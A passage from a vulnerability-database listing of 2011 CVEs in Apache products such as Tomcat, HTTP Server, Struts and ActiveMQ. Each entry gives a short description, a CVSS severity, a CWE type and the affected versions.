apache wicket 1.4.11
apache wicket 1.4.7
CVE-2011-2729 MEDIUM

native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 5.5.33
apache apache_commons_daemon 1.0.6
apache tomcat 7.0.13
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.7
apache tomcat 7.0.12
apache apache_commons_daemon 1.0.3
apache tomcat 6.0.31
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache apache_commons_daemon 1.0.4
apache tomcat 7.0.8
apache tomcat 7.0.17
apache apache_commons_daemon 1.0.5
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
CVE-2011-2767 HIGH

mod_perl 2.0 through 2.0.10 allows attackers to execute arbitrary Perl code by placing it in a user-owned .htaccess file, because (contrary to the documentation) there is no configuration option that permits Perl code for the administrator's control of HTTP request processing without also permitting unprivileged users to run Perl code in the context of the user account that runs Apache HTTP Server processes.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.10
redhat enterprise_linux 6.7
canonical ubuntu_linux 18.04
apache mod_perl *
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux 7.3
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 12.04
canonical ubuntu_linux 16.04
redhat enterprise_linux 7.4
redhat enterprise_linux_server 6.0
canonical ubuntu_linux 14.04
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux 7.6
CVE-2011-3190 HIGH

Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-3192 HIGH

The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
suse linux_enterprise_server 10
suse linux_enterprise_server 11
canonical ubuntu_linux 8.04
opensuse opensuse 11.4
opensuse opensuse 11.3
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
suse linux_enterprise_software_development_kit 11
canonical ubuntu_linux 11.04
suse linux_enterprise_software_development_kit 10
CVE-2011-3348 MEDIUM

The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_web_server 1.0.0
CVE-2011-3368 MEDIUM

The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.2.19
apache http_server 2.2.1
apache http_server 1.3.14
apache http_server 1.3.34
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 1.3.27
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 1.3.24
apache http_server 1.3.9
apache http_server 2.0.40
apache http_server 1.3.68
apache http_server 1.3.1.1
apache http_server 2.2.13
apache http_server 1.3.65
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.51
apache http_server 1.3.38
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server 1.3.33
apache http_server 2.0
apache http_server 2.2.2
apache http_server 2.2.14
apache http_server 2.2.20
apache http_server 1.3.39
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.43
apache http_server 1.3.25
apache http_server 2.0.38
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 2.0.57
apache http_server 2.2.18
apache http_server 1.3.6
apache http_server 1.3.32
apache http_server 1.3.28
apache http_server 1.3.13
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.28
apache http_server 1.3.42
apache http_server 1.3.19
apache http_server 1.3.5
apache http_server 2.0.61
apache http_server 1.3.4
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 1.3.10
apache http_server 1.3.29
apache http_server 1.3.16
apache http_server 1.3.36
apache http_server 1.3.23
apache http_server 1.3.31
apache http_server 2.0.32
apache http_server 1.3.30
apache http_server 1.3.1
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.46
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 2.0.59
apache http_server 1.3.41
apache http_server 1.3.20
apache http_server 2.2.3
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.64
apache http_server 2.2.9
apache http_server 1.3.22
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 1.3.15
apache http_server 2.0.42
apache http_server 1.3.11
apache http_server 2.0.55
apache http_server 1.3.35
apache http_server 2.0.63
apache http_server 1.3
apache http_server 2.0.60
apache http_server 1.3.37
apache http_server 1.3.8
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.0.34
apache http_server 1.3.3
CVE-2011-3375 MEDIUM

Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.13
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 7.0.12
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.21
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.8
apache tomcat 7.0.17
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
CVE-2011-3376 MEDIUM

org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.14
apache tomcat 7.0.21
apache tomcat 7.0.1
apache tomcat 7.0.13
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.15
apache tomcat 7.0.3
apache tomcat 7.0.8
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.17
apache tomcat 7.0.18
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.12
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.20
CVE-2011-3600 MEDIUM

The /webtools/control/xmlrpc endpoint in OFBiz XML-RPC event handler is exposed to External Entity Injection by passing DOCTYPE declarations with executable payloads that discloses the contents of files in the filesystem. In addition, it can also be used to probe for open network ports, and figure out from returned error messages whether a file exists or not. This affects OFBiz 16.11.01 to 16.11.04.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2011-3607 MEDIUM

Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache http_server 2.0.61
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 2.0.32
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.2.13
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 2.0.46
apache http_server 2.0.59
apache http_server 2.0.45
apache http_server 2.2.3
apache http_server 2.0.51
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.64
apache http_server 2.0
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.0.9
apache http_server 2.2.20
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
apache http_server 2.0.38
apache http_server 2.0.63
apache http_server 2.0.57
apache http_server 2.2.18
apache http_server 2.0.60
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.34
apache http_server 2.0.28
CVE-2011-3620 HIGH

Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache qpid 0.12
CVE-2011-3639 MEDIUM

The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.0a7 *
apache http_server 2.0.17
apache http_server 2.0.33
apache http_server 2.0a4 *
apache http_server 2.0.14
apache http_server 2.0.31
apache http_server 2.0.61
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 2.2.1
apache http_server 2.0.16
apache http_server 2.0.20
apache http_server 2.0a5 *
apache http_server 2.0.30
apache http_server 2.2.0
apache http_server 2.0.21
apache http_server 2.0.24
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 2.0.32
apache http_server 2.0a8 *
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.2.13
apache http_server 2.0.19
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 2.0.46
apache http_server 2.0.11
apache http_server 2.0.59
apache http_server 2.0.27
apache http_server 2.0.45
apache http_server 2.2.3
apache http_server 2.0.29
apache http_server 2.0.51
apache http_server 2.0.37
apache http_server 2.0.26
apache http_server 2.2.10
apache http_server 2.0.15
apache http_server 2.0a2 *
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.2.17
apache http_server 2.0a3 *
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.0.18
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 2.0a1 *
apache http_server 2.0a6 *
apache http_server 2.0.13
apache http_server 2.0.12
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
apache http_server 2.0.38
apache http_server 2.0.25
apache http_server 2.0a9 *
apache http_server 2.0.63
apache http_server 2.0.57
apache http_server 2.0.23
apache http_server 2.0.22
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.34
apache http_server 2.0.28
CVE-2011-3923 HIGH

Apache Struts before 2.3.1.2 allows remote attackers to bypass security protections in the ParameterInterceptor class and execute arbitrary commands.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache struts *
redhat jboss_enterprise_web_server 1.0.0
CVE-2011-4317 MEDIUM

The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.2.19
apache http_server 2.2.1
apache http_server 1.3.14
apache http_server 1.3.34
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 1.3.27
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 1.3.24
apache http_server 1.3.9
apache http_server 2.0.40
apache http_server 1.3.68
apache http_server 1.3.1.1
apache http_server 2.2.13
apache http_server 1.3.65
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.51
apache http_server 1.3.38
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server 1.3.33
apache http_server 2.0
apache http_server 2.2.2
apache http_server 2.2.14
apache http_server 2.2.20
apache http_server 1.3.39
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.43
apache http_server 1.3.25
apache http_server 2.0.38
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 2.0.57
apache http_server 2.2.18
apache http_server 1.3.6
apache http_server 1.3.32
apache http_server 1.3.28
apache http_server 1.3.13
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.28
apache http_server 1.3.42
apache http_server 1.3.19
apache http_server 1.3.5
apache http_server 2.0.61
apache http_server 1.3.4
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 1.3.10
apache http_server 1.3.29
apache http_server 1.3.16
apache http_server 1.3.36
apache http_server 1.3.23
apache http_server 1.3.31
apache http_server 2.0.32
apache http_server 1.3.30
apache http_server 1.3.1
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.46
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 2.0.59
apache http_server 1.3.41
apache http_server 1.3.20
apache http_server 2.2.3
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.64
apache http_server 2.2.9
apache http_server 1.3.22
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 1.3.15
apache http_server 2.0.42
apache http_server 1.3.11
apache http_server 2.0.55
apache http_server 1.3.35
apache http_server 2.0.63
apache http_server 1.3
apache http_server 2.0.60
apache http_server 1.3.37
apache http_server 1.3.8
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.0.34
apache http_server 1.3.3
CVE-2011-4343 MEDIUM

Information disclosure vulnerability in Apache MyFaces Core 2.0.1 through 2.0.10 and 2.1.0 through 2.1.4 allows remote attackers to inject EL expressions via crafted parameters.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache myfaces 2.0.6
apache myfaces 2.0.9
apache myfaces 2.0.2
apache myfaces 2.0.5
apache myfaces 2.0.3
apache myfaces 2.1.1
apache myfaces 2.1.0
apache myfaces 2.1.3
apache myfaces 2.0.8
apache myfaces 2.0.7
apache myfaces 2.0.10
apache myfaces 2.1.4
apache myfaces 2.1.2
apache myfaces 2.0.1
apache myfaces 2.0.4
CVE-2011-4415 LOW

The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.0.61
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 2.0.32
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.2.13
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 2.0.46
apache http_server 2.0.59
apache http_server 2.0.45
apache http_server 2.2.3
apache http_server 2.0.51
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.64
apache http_server 2.0
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.0.9
apache http_server 2.2.20
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
apache http_server 2.0.38
apache http_server 2.0.63
apache http_server 2.0.57
apache http_server 2.2.18
apache http_server 2.0.60
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.34
apache http_server 2.0.28
CVE-2011-4858 MEDIUM

Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache tomcat 7.0.13
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 7.0.21
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.35
apache tomcat 6.0.22
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.23
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.25
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.34
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-4905 MEDIUM

Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 3.1
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 3.2
apache activemq 5.1.0
apache activemq 4.0.2
apache activemq 5.3.0
apache activemq 1.5
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 3.2.2
apache activemq 2.0
apache activemq 5.4.1
apache activemq 4.1.1
apache activemq 4.1.0
apache activemq *
apache activemq 4.1.2
apache activemq 1.1
apache activemq 5.5.0
apache activemq 1.2
apache activemq 5.3.2
apache activemq 3.0
apache activemq 4.0
apache activemq 1.3
apache activemq 3.2.1
apache activemq 5.2.0
apache activemq 2.1
apache activemq 1.4
CVE-2011-5034 HIGH

Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache geronimo 1.2
apache geronimo 1.1
apache geronimo 2.2
apache geronimo 2.1.6
apache geronimo 1.0
apache geronimo 2.1.8
apache geronimo *
apache geronimo 2.1.7
apache geronimo 2.1.2
apache geronimo 2.1.5
apache geronimo 2.0.2
apache geronimo 2.0.1
apache geronimo 2.1.3
apache geronimo 2.1.4
apache geronimo 1.1.1
apache geronimo 2.1
apache geronimo 2.1.1
CVE-2011-5057 MEDIUM

Apache Struts 2.3.1.2 and earlier, 2.3.19-2.3.23, provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts *
CVE-2011-5062 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-5063 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
